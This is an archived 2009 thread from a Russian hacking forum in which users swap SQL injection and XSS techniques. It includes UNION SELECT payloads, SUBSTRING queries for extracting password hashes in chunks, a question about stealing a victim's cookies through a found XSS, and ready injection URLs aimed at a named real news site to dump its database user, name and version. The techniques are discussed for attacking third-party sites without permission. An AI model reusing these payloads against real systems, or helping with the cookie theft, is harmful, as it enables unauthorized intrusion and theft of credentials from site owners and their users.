ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

11.03.2009, 02:11
|
|
Познающий
Регистрация: 18.03.2006
Сообщений: 47
Провел на форуме: 311345
Репутация:
9
|
|
А всётаки зачем в Sql injection tool 4 есть параметр LIMIT 1,1 ? Почему например в моем случае надо его ставить,как именно я составил запрос. (я забыл что надо ставить несуществуюшие данные типа idPaper=-89 )
И что означает {1} (сами ковычки { } ) в проге Sql injection tool ?:
Printable fields : {1},3,4,5,6,7
Последний раз редактировалось Stalingrad; 11.03.2009 в 02:14..
|
|
|

11.03.2009, 02:27
|
|
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме: 1734541
Репутация:
214
|
|
Сообщение от Stalingrad
А всётаки зачем в Sql injection tool 4 есть параметр LIMIT 1,1 ? Почему например в моем случае надо его ставить,как именно я составил запрос. (я забыл что надо ставить несуществуюшие данные типа idPaper=-89 )
И что означает {1} (сами ковычки { } ) в проге Sql injection tool ?:
Printable fields : {1},3,4,5,6,7
Printable fields ( ака печатное поле)
скобками ты выделяешь столбец в который выводить данные
{1},3,4,5,6,7 - в перввый
|
|
|

11.03.2009, 02:22
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
2 Jokester,что делать если в скуле урезаются длина запроса
|
|
|

11.03.2009, 02:33
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме: 1936181
Репутация:
688
|
|
Сообщение от Gorev
2 Jokester,что делать если в скуле урезаются длина запроса
запроса или вывода ? если вывода то через substring ... а может я и ошибаюсь ...
|
|
|

11.03.2009, 02:37
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
вывода извиняюсь, через substring я знаю, есть ли другой способ?
|
|
|

11.03.2009, 03:44
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
сокращать сам запрос, все двойные числа заменить на одинарные, ну т.е.
union+select+1,2,3,4,5,6,7,8,9,10,11,12,13
заменить на
union+select+1,2,3,4,5,6,7,8,9,0,1,2,3
для начала. Даже на этом пример съекономилось 4 символа
|
|
|

11.03.2009, 04:26
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме: 1936181
Репутация:
688
|
|
Сообщение от Pashkela
сокращать сам запрос, все двойные числа заменить на одинарные, ну т.е.
union+select+1,2,3,4,5,6,7,8,9,10,11,12,13
заменить на
union+select+1,2,3,4,5,6,7,8,9,0,1,2,3
для начала. Даже на этом пример съекономилось 4 символа
мы тут про вывод 
|
|
|

11.03.2009, 10:20
|
|
Новичок
Регистрация: 04.03.2009
Сообщений: 23
Провел на форуме: 59175
Репутация:
0
|
|
Вопрос: Если XSS был найден посредством подставления вот этого скрипта: "><script>alert(document.cookie)</script>

то дальнейшие мои действия для изъятия куки у жертвы такиеже, как и в случае еслибы я уязвимость нашол вот этим скриптом: "><script>alert(XSS)</script> ???
|
|
|

11.03.2009, 10:42
|
|
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
Провел на форуме: 792994
Репутация:
104
|
|
Да.Такие-же действия.
|
|
|

11.03.2009, 12:18
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Gorev
Не вполне понял вопрос.
Если скрипт обрезает выводимые данные, допустим до 15 символов, то , как тут уже сказали, SUBSTRING. Выглядеть это будет примерно так(для хеша 32):
1-е 15 символов
union select SUBSTRING(passwd, 0, 15) from user
c 15 по 30
SUBSTRING(passwd, 15, 30)
и остальные 2
SUBSTRING(passwd, 30, 32)
========================
Иногда встречается "наложение" вывода, ну например сдесь:
http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,User(),Database(),Ve rsion()),2,3,4,5,6,7,8,9/*
Вот так нам не видно юзера
http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,0x6C6F6C6F6C6F,User( ),Database(),Version()),2,3,4,5,6,7,8,9/*
А вот так видно всё
========================
Если на вопрос не ответил, поподробнее опиши проблему, что выводится, что не выводится, при каких условиях, и чем тебя SUBSTRING не устраивает
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|